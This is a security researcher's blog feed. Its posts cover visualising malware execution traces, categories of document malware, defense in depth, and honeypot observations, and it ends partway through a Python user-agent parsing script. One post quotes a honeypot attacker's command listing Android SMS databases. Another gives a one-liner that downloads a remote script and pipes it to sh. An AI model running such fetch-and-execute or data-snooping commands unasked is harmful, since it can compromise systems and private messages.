Carter Yagemannhttps://carteryagemann.com/2019-02-21T21:00:00-05:00I'm a computer scientist and cybersecurity researcher. My interests include hacking, system design, and software engineering.Malware Has a Color2019-02-21T21:00:00-05:002019-02-21T21:00:00-05:00Carter Yagemanntag:carteryagemann.com,2019-02-21:/malware-colors.html<p>In an upcoming paper I plan to present some preliminary work in applying machine learning
to program control flows to detect anomalies. Specifically, my coauthors and I demonstrate
how to use this to analyze document malware with promising accuracy. In
<a href="https://carteryagemann.com/doc-mal-categories.html">previous posts</a>, I've detailed the threat malicious documents
pose to …</p><p>In an upcoming paper I plan to present some preliminary work in applying machine learning
to program control flows to detect anomalies. Specifically, my coauthors and I demonstrate
how to use this to analyze document malware with promising accuracy. In
<a href="https://carteryagemann.com/doc-mal-categories.html">previous posts</a>, I've detailed the threat malicious documents
pose to users and shared some insights into why this problem remains prevalent. For this post,
I want to switch gears and share a fun technique I use to help understand
what the control flow anomaly detector is really seeing. Put playfully, I'm going to demonstrate how
to spot malware by the color it makes. Enjoy.</p>
<p>Without going into too many details about the system (I'll be sure to make a post about where to
find the paper and code when it becomes available), at a high level we collect and use execution traces of a target
program (e.g. Acrobat Reader) opening benign documents to create a path prediction
model. We then use the model on an unlabeled trace with the intuition being that any occurring anomalies
will cause a sudden drop in prediction accuracy. There's a little more to it than that, but this is the gist
of how the system operates.</p>
<p>One challenge with such a system is the traces are massive. Even if we narrow our focus to
only indirect control flow transfers (e.g. <code>ret</code>, <code>icall</code>, and <code>ijmp</code>), that's still thousands to
millions of events per minute of real time execution. This makes diagnosing whether there was a bug or
whether the malware simply didn't detonate a challenge.</p>
<p>One option is to manually analyze the malware sample, typically by running the virtual machine in another
framework. This is time consuming though, which is why I've come up with a niftier solution that involves
visualizing the trace in conjunction with the model's output. This is how I discovered that malware has a
color.</p>
<h2>Visualization Technique</h2>
<p>First, I convert each target address into a color by hashing it. For simplicity, I take the first three
bytes of a <code>md5</code> hash to get a RGB tuple. The reason I use a secure hashing algorithm instead of a simple
checksum is so nearby addresses will create very different colors, creating contrast. Here's an example of
what a benign trace looks like:</p>
<p><center>
<img alt="Benign Trace" src="https://carteryagemann.com/images/vis-ben1.png">
</center></p>
<p>We can clearly see patterns, but there's no clear indicator of what makes one normal and another
anomalous. Let's compare with a family of PDF malware that the system is good at detecting: <code>pdfka</code>. Here's one
of the traces:</p>
<p><center>
<img alt="PDFKA Color Trace" src="https://carteryagemann.com/images/vis-pdfka1.png">
</center></p>
<p>Look at that streak of dark blue! What's going on there? Is this an exploit or simply a pattern our previous
example didn't capture? To find out, I create a second image where each target is a white pixel if the
model predicted it correctly and black if the prediction was wrong. Here's the result for the same
trace:</p>
<p><center>
<img alt="PDFKA Model Output" src="https://carteryagemann.com/images/vis-pdfka2.png">
</center></p>
<p>Looks like there's a streak of incorrect predictions that lines up with the dark blue, but let's confirm it
by subtracting the two images. This will cause areas of accurate prediction (white in the second image) to
become black while areas of incorrect predictions will keep their color from the first image. Here's the
result:</p>
<p><center>
<img alt="PDFKA Subtraction" src="https://carteryagemann.com/images/vis-pdfka3.png">
</center></p>
<p>Sure enough, that blue streak is an anomaly produced by <code>pdfka</code>. In fact, if we were to visualize all the <code>pdfka</code>
samples in our paper's evaluation dataset, we would find they all contain a blue streak. What the blue is really
visualizing is an exploit (<code>CVE-2010-0188</code>) being carried out against the TIFF parser library in <code>AcroRd32.dll</code>.
Therefore, we can say the color of <code>pdfka</code> is dark blue!</p>
<h2>Other Examples</h2>
<p>To demonstrate the value of subtracting, consider this visualization of opening a Microsoft Word document:</p>
<p><center>
<img alt="MS Word Trace" src="https://carteryagemann.com/images/vis-msword1.png">
</center></p>
<p>You may be tempted to conclude this is a red malware (since coming up with this technique, I've been referring
to malware by their colors instead of family names for fun), but it's actually benign. We can see this in
the subtraction:</p>
<p><center>
<img alt="MS Word Subtraction" src="https://carteryagemann.com/images/vis-msword2.png">
</center></p>
<p>No colors means no anomalies. Now let's see a trace of <code>hancitor</code>:</p>
<p><center>
<img alt="Hancitor" src="https://carteryagemann.com/images/vis-hancitor.png">
</center></p>
<p>As you can see, it's green malware. Meanwhile <code>thus</code> is blue-purple:</p>
<p><center>
<img alt="Thus" src="https://carteryagemann.com/images/vis-thus.png">
</center></p>
<p>I think that's enough examples to make my point. I hope you've been convinced that malware has a color.
Thanks for reading and happy hacking!</p>Upcoming MLsploit Demo at Black Hat Asia 20192019-01-17T17:00:00-05:002019-01-17T17:00:00-05:00Carter Yagemanntag:carteryagemann.com,2019-01-17:/bh-asia-19.html<p>A framework I helped develop called MLsploit will be demoed at Black Hat Asia 2019.
You can read more about it <a href="https://www.blackhat.com/asia-19/arsenal/schedule/index.html#mlsploit-a-cloud-based-framework-for-adversarial-machine-learning-research-14256">here</a>.</p><p>A framework I helped develop called MLsploit will be demoed at Black Hat Asia 2019.
You can read more about it <a href="https://www.blackhat.com/asia-19/arsenal/schedule/index.html#mlsploit-a-cloud-based-framework-for-adversarial-machine-learning-research-14256">here</a>.</p>Three Kinds of Document Malware and Designing Frameworks to Detect Them2018-12-27T12:00:00-05:002018-12-27T12:00:00-05:00Carter Yagemanntag:carteryagemann.com,2018-12-27:/doc-mal-categories.html<p>Lately I've been spending a lot of time with document malware and exploring
techniques for detection. Malicious documents pose interesting challenges and
have become the typical first vector for adversaries to achieve a
foothold. Despite this, document malware seems largely overlooked by academics
compared to their executable counterparts. In short …</p><p>Lately I've been spending a lot of time with document malware and exploring
techniques for detection. Malicious documents pose interesting challenges and
have become the typical first vector for adversaries to achieve a
foothold. Despite this, document malware seems largely overlooked by academics
compared to their executable counterparts. In short, it's an area worth
exploring.</p>
<p>As I compared the current detection techniques, I noticed the pros and cons
are nuanced. Static analysis is quick and accurate, but very vulnerable to
evasion via adversarial perturbation. Dynamic analysis is slower and error
prone because samples can fail to trigger, but produce richer data.
These characteristics are further amplified by the use of machine learning.
Adding junk bytes between the elements of a PDF can evade a static feature
learner <a href="http://www.ra.cs.uni-tuebingen.de/mitarb/srndic/srndic-laskov-sp2014.pdf">in seconds</a>.
Unfortunately, dynamic features don't fare much <a href="https://evademl.org/docs/evademl.pdf">better</a>.</p>
<p>In time I've begun to formulate a theory that <em>there are currently three kinds of document malware</em>.
By applying this insight, I find I can substantially influence the results of
my experiments. While not as conclusive as something like a double disassociation,
I want to share what I've observed in hopes that it'll inspire others when designing
their detection systems and provoke feedback.</p>
<p>So without further ado, here's my theory. Currently, there are three kinds of
document malware: <strong>exploit-based, abuse-based, and phishing-based</strong>.
While I propose categories, note that they are not mutually exclusive.
Malware authors can always chain and blend
techniques to achieve their goals. Therefore, these categories should be seen as
points on a spectrum. That said, complexity invites failure, so I do not expect
real world authors to stray far from these focal points.
The following paragraphs elaborate on each category in reverse order.</p>
<h3>Phishing-based</h3>
<p>This is the trickiest category for a computer scientist because humans are
complicated and confusing entities. The exemplar of this category is a document
that tries to convince the user to take some compromising action. There may be
a link to a fake website or steps that lead to disabling a security feature.
Admittedly, this is a category I currently steer clear of.
<em>The best solutions are better education, stronger polices, and a clear strategy for recovery when a human mistake in inevitably made.</em>
Also note that this category
is the most likely to be chained with others. For example, a document may need
to lure the victim into clicking a button before a payload can be used. In rare
cases, user interaction may even be leveraged to thwart automated analysis.
Thankfully, I have yet to see a malware author embed a CAPTCHA in their document.</p>
<h3>Abuse-based</h3>
<p>This category does not consider the human user, but distinguishes itself
in how it uses the target application. The exemplar here
is a PDF containing JavaScript or a Word document with macros that uses provided
APIs to download and execute additional malware. The key point to emphasize here
is these documents do not violate the specification of the application.
<em>The program is functioning as intended.</em> This is why I label these instances
as abuse rather than exploitation. This distinction is critical to consider when
designing a detection framework. On the one hand, they're tricky because they
blend in with benign behavior. This is why, for example, looking at system call
sequences is a bad idea for this category. On the other hand, since the program's
integrity isn't compromised, it's safe to make strong assumptions in these
situations. <em>This is where static analysis is best suited.</em> Designed
correctly, such frameworks can leverage strong models of the target program to
accurately and statically detect abuse. This saves resources and minimizes exposure to
noise.</p>
<h3>Exploit-based</h3>
<p>Which brings us to the last category. Here's were we see the stuff 0-days and CVEs
are made from. It's also where all corners of the security community like to
flaunt their technical knowhow with intricate ROP chains and compact shellcode.
Jargon aside,
<em>this category differs from abuse-based in that it does violate the program's specification.</em>
Memory corruption, underflows, overflows, and more are all fair game for achieving
arbitrary code execution. This means the author's attacks can take unusual forms,
like malformed images, and detection frameworks have to cope. For this reason,
<em>this is where dynamic analysis overtakes static.</em> Because exploits by definition
break models and assumptions, the only way towards proactive detection is to actually
trigger them.</p>
<p>I hope readers find this categorization useful. Note that this is not the only way document
malware can be divided. For example, payloads can execute inside the target
application or in a separate process, creating a spectrum of <em>intrinsic</em> verses
<em>extrinsic</em> behaviors. Regardless, my three category theory has helped me design novel
systems and interpret the evaluation results, so I wanted to share it.</p>
<p>Thanks for reading.</p>Mention for Georgia Tech Vulnerability Disclosure2018-09-05T22:15:00-04:002018-09-05T22:15:00-04:00Carter Yagemanntag:carteryagemann.com,2018-09-05:/gatech-vuln-reporters.html<p>Georgia Tech has <a href="https://security.gatech.edu/vulnerability-reporters">acknowledged me</a> for
a past vulnerability I disclosed to them.</p><p>Georgia Tech has <a href="https://security.gatech.edu/vulnerability-reporters">acknowledged me</a> for
a past vulnerability I disclosed to them.</p>The Unfortunate Economics of Defense in Depth2018-08-14T23:30:00-04:002018-08-14T23:30:00-04:00Carter Yagemanntag:carteryagemann.com,2018-08-14:/economics-depth-defense.html<p><center>
<img alt="Castles benefit from defense in depth." src="https://carteryagemann.com/images/castle.jpg">
</center></p>
<p>A mantra we hear all the time in security is the notion of <strong>defense in depth</strong>.
It's applied in numerous areas from protecting computer systems to safeguarding airports.
Anyone who receives formal training in security will likely encounter the term at
least once in their coursework. It's a milestone we …</p><p><center>
<img alt="Castles benefit from defense in depth." src="https://carteryagemann.com/images/castle.jpg">
</center></p>
<p>A mantra we hear all the time in security is the notion of <strong>defense in depth</strong>.
It's applied in numerous areas from protecting computer systems to safeguarding airports.
Anyone who receives formal training in security will likely encounter the term at
least once in their coursework. It's a milestone we are told to strive for when
designing secure systems.</p>
<p>For readers who are unfamiliar with the term, it's the idea that when designing security into
a system, we should place several overlapping layers of defense wherever possible.
The insight behind this idea is that thwarting an attack only requires one layer of defense to
succeed whereas the attacker's success depends on penetrating every layer.
Consider, for example, an invading army storming a castle.
In order for the invasion to succeed, the invaders must survive raining arrows from archers,
traverse a moat, breach the castle walls, and kill the soldiers inside. Failure to surmount
any one of these defenses spells disaster for the attack. Worse yet for the invading army, as long
as each layer's chance of successfully halting the attack is independent from the other layers, adding more layers
makes the attacker's task more likely to fail. On the other hand, this is great news if
you are the one assigned to defend the castle.</p>
<p>Unfortunately, step outside the classroom and it will not take long to run into
the counterforce that stifles an otherwise brilliant concept. The force I am referring
to is <strong>economics</strong>. Defenses don't come for free and as I plan to highlight in this
blog post, there is a fundamental problem with applying <strong>defense in depth</strong> once <strong>economics</strong> enters
the equation.</p>
<p>To aid my explanation, let's use fair coin flips as a simple running example.
Although coins are a far cry from airports or castles, the underlying probabilities behind flipping
a coin are simple to understand and also sufficient to make my point.</p>
<p>As you are probably already
aware, a fair coin flip yields one of two possible outcomes, heads or tails, with equal and
mutually exclusive probabilities. The probability of getting heads once is 50%. Getting heads
twice in a row is 25%. Three times is 12.5%. This probability <em>p</em> is expressed by the following formula for <em>x</em> coin flips:</p>
<p><center>
<img alt="p = 1 / 2^x" src="https://carteryagemann.com/images/coin-flip-prob.jpg">
</center></p>
<p>If we graph this function for a couple of flips, we get the following figure:</p>
<p><center>
<img alt="Graph 1" src="https://carteryagemann.com/images/coin-flip-fig1.jpg">
</center></p>
<p>As we can see, the relationship between the number of flips and the probability is <strong>exponential</strong>.
Adding a few additional flips significantly impacts the probability of getting all heads at first, but
as even more flips are added, eventually the effect diminishes. In other words, the difference in
chance of getting two heads verses three is substantial, but the difference between 999 and
1,000 heads is comparatively minuscule. Tying this analogy back to security, if we map the outcome of heads
to the attacker successfully breaching a layer of security, we can see how overlapping a few defensive layers
can offer significantly better security and reduce the attacker's chance of success. However, with
each additional layer, the defender's gain diminishes. Regardless, this outcome shows that defense
in depth is fundamentally valuable and we can safely apply it in the real world as long as
the effectiveness of the layers being evaluated are completely (or at least nearly) independent to each other.</p>
<p>Unfortunately, as I alluded to in the introduction, every layer of defense has a cost to design, implement,
deploy, and maintain. If these costs are also completely (or at least nearly) independent, a problem arises.
Namely, each additional layer raises the cost of the overall defense <strong>linearly</strong>, but the return yielded
in security diminishes <strong>exponentially</strong>. Returning to our running example, now consider the case where each flip
costs one unit of resource to perform. If we add this function to our previous graph, we get the
following figure:</p>
<p><center>
<img alt="Graph 2" src="https://carteryagemann.com/images/coin-flip-fig2.jpg">
</center></p>
<p>And if we reformat this graph to show the proportional gain in cost to the gain in security, we get:</p>
<p><center>
<img alt="Graph 3" src="https://carteryagemann.com/images/coin-flip-fig3.jpg">
</center></p>
<p>Put plainly, the cost of using defense in depth to achieve <strong>decent</strong> security is relatively <strong>cheap</strong>, but
achieving <strong>exceptional</strong> security is extremely <strong>expensive</strong>. This is bad news for the defender and a
fundamental limitation to the idea of defense in depth.</p>
<p>Hopefully you now understand the title of this blog post and realize why this relationship is important
to grasp. For example, understanding this topic helps explain the controversies and debates surrounding
the cost of funding the Transportation Security Administration's twenty "Layers of Security" framework:</p>
<p><center>
<img alt="The TSA's Layers of Security." src="https://carteryagemann.com/images/tsa-layers.jpg">
</center></p>
<p>I'll forgo an in-depth analysis of this chart since other researchers have already examined it in
<a href="http://a.co/bSrRjVP">great detail</a>, but to summarize, if you pick a relevant threat to airport
security and consider each layer's effect on stopping it, you'll realize removing any one layer has
seemingly little impact on the overall risk of failure. This begs the question of whether there are layers that
can be removed to significantly reduce cost without significantly reducing security. Certainly an
idea worth exploring, if the science can be separated from the politics. Until then, I hope you've found this
blog post interesting and insightful.</p>Paper Accepted to ACM CCS 20182018-07-23T22:00:00-04:002018-07-23T22:00:00-04:00Carter Yagemanntag:carteryagemann.com,2018-07-23:/ccs18-publication.html<p>A paper I co-authored has been accepted to the <em>25th ACM Conference on Computer and
Communications Security</em> (CCS'18) being held in Toronto, Canada from October
15, 2018 to October 19, 2018.</p>
<p><strong>Title:</strong> Enforcing Unique Code Target Property for Control-Flow Integrity</p>
<p><strong>Authors:</strong> Hong Hu, Chenxiong Qian, <em>Carter Yagemann</em>, Simon Pak Ho …</p><p>A paper I co-authored has been accepted to the <em>25th ACM Conference on Computer and
Communications Security</em> (CCS'18) being held in Toronto, Canada from October
15, 2018 to October 19, 2018.</p>
<p><strong>Title:</strong> Enforcing Unique Code Target Property for Control-Flow Integrity</p>
<p><strong>Authors:</strong> Hong Hu, Chenxiong Qian, <em>Carter Yagemann</em>, Simon Pak Ho Chung,
Bill Harris, Taesoo Kim, Wenke Lee</p>
<p><strong>Abstract:</strong></p>
<p>The goal of control-flow integrity (CFI) is to stop control-hijacking attacks by ensuring that each indirect control-flow transfer (ICT) jumps to its legitimate target. However, existing implementations of CFI have fallen short of this goal because their approaches are inaccurate and as a result, the set of allowable targets for an ICT instruction is too large, making illegal jumps possible.</p>
<p>In this paper, we propose the Unique Code Target (UCT) property for CFI. Namely, for each invocation of an ICT instruction, there should be one and only one valid target. We develop a prototype called uCFI to enforce this new property. During compilation, uCFI identifies the sensitive instructions that influence ICT and instruments the program to record necessary execution context. At runtime, uCFI monitors the program execution in a different process, and performs points-to analysis by interpreting sensitive instructions using the recorded execution context in a memory safe manner. It checks runtime ICT targets against the analysis results to detect CFI violations. We apply uCFI to SPEC benchmarks and 2 servers (nginx and vsftpd) to evaluate its efficacy of enforcing UCT and its overhead. We also test uCFI against control-hijacking attacks, including 5 real-world exploits, 1 proof of concept COOP attack, and 2 synthesized attacks that bypass existing defenses. The results show that uCFI strictly enforces the UCT property for protected programs, successfully detects all attacks, and introduces less than 10% performance overhead.</p>Weird Things Are Afoot In The Honeypot2018-05-30T11:00:00-04:002018-05-30T11:00:00-04:00Carter Yagemanntag:carteryagemann.com,2018-05-30:/android-ssh.html<p>Here's something you don't see every day. The logs from my SSH honeypot show
someone brute-forcing the password for root and then executing:</p>
<div class="highlight"><pre><span></span>ls /data/data/com.android.providers.telephony/databases
</pre></div>
<p>This is a strange directory to look for because it's where Android devices
store the SQLite databases for SMS …</p><p>Here's something you don't see every day. The logs from my SSH honeypot show
someone brute-forcing the password for root and then executing:</p>
<div class="highlight"><pre><span></span>ls /data/data/com.android.providers.telephony/databases
</pre></div>
<p>This is a strange directory to look for because it's where Android devices
store the SQLite databases for SMS messages and contacts. Why would an attacker
except an SSH server on the internet to be an Android device? Are there IoT
devices based on Android that run SSH servers and also store contacts? If
someone knows, please tell me!</p>EFF and EFAIL: An Example of Hype Culture Gone Awry2018-05-14T21:30:00-04:002018-05-14T21:30:00-04:00Carter Yagemanntag:carteryagemann.com,2018-05-14:/eff-efail.html<p>I usually try to keep my blog posts technical and free of politics, but
I can't hide my frustration over EFF's response to today's release of the
<a href="https://efail.de/">EFAIL</a> vulnerability.</p>
<p>If you haven't heard by now, EFAIL is the
name of a vulnerability having to do with how email clients like …</p><p>I usually try to keep my blog posts technical and free of politics, but
I can't hide my frustration over EFF's response to today's release of the
<a href="https://efail.de/">EFAIL</a> vulnerability.</p>
<p>If you haven't heard by now, EFAIL is the
name of a vulnerability having to do with how email clients like Thunderbird handle PGP
encrypted emails. This vulnerability allows a strong adversary to decrypt
emails given that they have previously encrypted messages from a victim, can
tamper with emails in-transit, and assuming the victim's client is configured to
automatically fetch remote content.</p>
<p>I emphasize the word <em>strong</em> because
any security researcher can see that these preconditions mean this attack
is only a concern to individuals being targeted by nation-states.
As many Slashdot users and companies like ProtonMail
<a href="https://protonmail.com/blog/pgp-vulnerability-efail/">have pointed out</a>,
this vulnerability is over-hyped, blown out of proportion,
and the course of action being loudly proposed is somewhere between
draconian and moronic.</p>
<p>Unfortunately, it seems EFF is at the forefront of this
<a href="https://www.eff.org/deeplinks/2018/05/attention-pgp-users-new-vulnerabilities-require-you-take-action-now">crusade</a>
to misguide users. Within hours of the details being released,
EFF published a blog post advising everyone to immediately stop using PGP.
Since then, less than 24 hours later, EFF has published over <strong>13</strong> articles
driving home the "crisis" and providing step-by-step tutorials on how to
"take action" by
<a href="https://www.eff.org/deeplinks/2018/05/disabling-pgp-thunderbird-enigmail">disabling PGP</a>
and
<a href="https://www.eff.org/deeplinks/2018/05/using-command-line-decrypt-message-linux">decrypting emails</a>.
It is impressive that EFF has managed to write so much about EFAIL
in so little time.</p>
<p>As a security researcher, allow me to share a piece of wisdom echoed by many
of my peers. <em>The appropriate reaction to a vulnerability that can potentially
decrypt emails <strong>is not</strong> to start sending messages in plaintext</em>.
Sane people don't erase their operating system because of a bug, disable their
firewall because of a glitch, or stop using encryption because of a flawed
implementation. Decide how big of a risk EFAIL is to you, come up with a plan
for remediation based on that risk, and apply software patches when they become
available. For most users, this boils down to simply continuing your good security habits.
Disabling security in response to a bug is insanity.</p>
<p><strong>Shame on EFF for over-hyping vulnerabilities and giving terrible security advice!</strong></p>Debian Apt Repo for libipt2018-02-24T18:30:00-05:002018-02-24T18:30:00-05:00Carter Yagemanntag:carteryagemann.com,2018-02-24:/libipt-repo.html<p>As part of my Ph.D. research, I play around with Intel Processor Trace a lot.
As a result, I frequently use <a href="https://github.com/01org/processor-trace">libipt</a>;
both as a library for my own software and for the reference programs it includes.
<code>ptdump</code> and <code>ptxed</code> are my goto utilities for quickly checking and
manipulating …</p><p>As part of my Ph.D. research, I play around with Intel Processor Trace a lot.
As a result, I frequently use <a href="https://github.com/01org/processor-trace">libipt</a>;
both as a library for my own software and for the reference programs it includes.
<code>ptdump</code> and <code>ptxed</code> are my goto utilities for quickly checking and
manipulating traces. They're super useful!</p>
<p>Sadly on Debian and Ubuntu, the default package repositories only have a package
for the main library (no pre-compiled program binaries) that is woefully out
of date (last update was in 2016). Having to repeatably compile
<a href="https://github.com/intelxed/xed">xed</a> and
<a href="https://github.com/01org/processor-trace">libipt</a>
from source quickly got annoying, so I've decided to publish my own repository. I've
also made it public in hopes that others will find it useful.</p>
<p>The repository tracks the master branch on <a href="https://github.com/01org/processor-trace">libipt</a>
and <a href="https://github.com/intelxed/xed">xed</a>, so its packages should always contain
the latest code. I've made adding it to apt super easy:</p>
<div class="highlight"><pre><span></span>sh -c <span class="s2">&quot;</span><span class="k">$(</span>wget -qO - https://super.gtisc.gatech.edu/libipt.sh<span class="k">)</span><span class="s2">&quot;</span>
</pre></div>
<p>It currently has the following libraries:</p>
<ul>
<li>libxed</li>
<li>libxed-dev</li>
<li>libipt (includes the sideband library)</li>
</ul>
<p>And the following pre-compiled programs:</p>
<ul>
<li>ptdump</li>
<li>pttc</li>
<li>ptxed</li>
</ul>
<p>More information about these libraries and programs is available in their respective
documentation. I hope to add more packages in the coming days.</p>
<p>For people interested in learning how to host their own repositories, I built this
server using <a href="https://www.gocd.org/">gocd</a>, <a href="https://www.aptly.info/">aptly</a>, and
<a href="https://httpd.apache.org/">apache</a>.</p>H&R Block "MyBlock" App + USA Government Website Analytics = PROFIT2018-02-09T16:00:00-05:002018-02-09T16:00:00-05:00Carter Yagemanntag:carteryagemann.com,2018-02-09:/hrb-analytics.html<p>I like data mining. For better or worse, it's the gold of the digital age. So
when the USA government decided to make the analytical data for their publicly
facing websites available for <a href="https://analytics.usa.gov/data/">download</a>, I
jumped at the opportunity. Thanks to this lovely data source, I can get
insights into …</p><p>I like data mining. For better or worse, it's the gold of the digital age. So
when the USA government decided to make the analytical data for their publicly
facing websites available for <a href="https://analytics.usa.gov/data/">download</a>, I
jumped at the opportunity. Thanks to this lovely data source, I can get
insights into how popular various browsers and operating systems are, how
frequently devices connect to USA government websites from foreign IP
address, and more.</p>
<p>Sadly, the website only offers metrics for the past 30 days. Luckily, it's
pretty easy to setup a raspberry pi or other small device to periodically fetch
the freshest numbers and build a larger dataset. This is what I've been doing
since August of 2016. <strong>If you're interested, send me an email and I'll be happy
to share</strong>. After all, according to the government's website: <em>"this website and
its data are free for you to use without restriction."</em></p>
<p>Continuing my story, I was skimming over the most recent metrics when I noticed
a funny browser user-agent:</p>
<div class="highlight"><pre><span></span>HRB-MOBILE-IOS-PHONE-MYBLOCK-TOUCHID-6.1.0-Mozilla
</pre></div>
<p>With a quick search, I figured out that
<a href="https://itunes.apple.com/us/app/my-block/id490111274">MyBlock</a> is a mobile app
offered by H&amp;R Block. More interesting though is the juicy information H&amp;R
Block decided to embed in these user-agent strings. As we can see, they contain
the name of the app, the version number, the OS (iOS or Android), the
device form factor (phone or tablet), and in the case of iOS, it even mentions
if TouchID or FaceID was used. As a security researcher, I'm particularly
interested in this last tidbit because people use H&amp;R Block to file taxes and
these user-agents started appearing January 7, 2018 (i.e., tax season). So how
many people use the various authentication methods offered by Apple to protect
their tax filing app? Let's find out!</p>
<p>The following is a small Python script I wrote to filter the data. The parsing
and filtering leaves much to be desired, but I didn't want to spend too much time
on such a simple task:</p>
<div class="highlight"><pre><span></span><span class="ch">#!/usr/bin/env python</span>
<span class="kn">import</span> <span class="nn">sys</span>
<span class="kn">import</span> <span class="nn">json</span>
<span class="k">def</span> <span class="nf">parse_subtokens</span><span class="p">(</span><span class="n">tokens</span><span class="p">):</span>
<span class="sd">&quot;&quot;&quot; Parses subtokens and returns a dictionary. If invalid, None is returned.</span>
<span class="sd"> We expect Android user agents to be in the form of:</span>
<span class="sd"> HBR MOBILE ANDROID [PHONE|TABLET] MYBLOCK [VERSION] &lt;BROWSER&gt;</span>
<span class="sd"> and iOS user agents to be in the form of:</span>
<span class="sd"> HBR MOBILE IOS [PHONE|TABLET] MYBLOCK &lt;TOUCHID|FACEID&gt; [VERSION] [BROWSER]</span>
<span class="sd"> &quot;&quot;&quot;</span>
<span class="n">res</span> <span class="o">=</span> <span class="p">{}</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">0</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;HRB&#39;</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">1</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;MOBILE&#39;</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;ANDROID&#39;</span> <span class="ow">and</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;IOS&#39;</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;OS&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;PHONE&#39;</span> <span class="ow">and</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;TABLET&#39;</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;DEVICE&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">3</span><span class="p">]</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span> <span class="o">!=</span> <span class="s1">&#39;MYBLOCK&#39;</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;APP&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">4</span><span class="p">]</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="s1">&#39;ANDROID&#39;</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">1</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;N/A&#39;</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;AUTH&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;N/A&#39;</span>
<span class="k">elif</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;AUTH&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;N/A&#39;</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="k">if</span> <span class="n">tokens</span><span class="p">[</span><span class="mi">2</span><span class="p">]</span> <span class="o">==</span> <span class="s1">&#39;IOS&#39;</span><span class="p">:</span>
<span class="k">if</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">2</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;AUTH&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="s1">&#39;N/A&#39;</span>
<span class="k">elif</span> <span class="nb">len</span><span class="p">(</span><span class="n">tokens</span><span class="p">[</span><span class="mi">5</span><span class="p">:])</span> <span class="o">==</span> <span class="mi">3</span><span class="p">:</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;BROWSER&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">1</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;VERSION&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">2</span><span class="p">]</span>
<span class="n">res</span><span class="p">[</span><span class="s1">&#39;AUTH&#39;</span><span class="p">]</span> <span class="o">=</span> <span class="n">tokens</span><span class="p">[</span><span class="o">-</span><span class="mi">3</span><span class="p">]</span>
<span class="k">else</span><span class="p">:</span>
<span class="k">return</span> <span class="bp">None</span>
<span class="c1"># Cleanups:</span>
<span class="c1"># 1) Some versions of the Android app prefix &#39;v&#39; onto version</span>
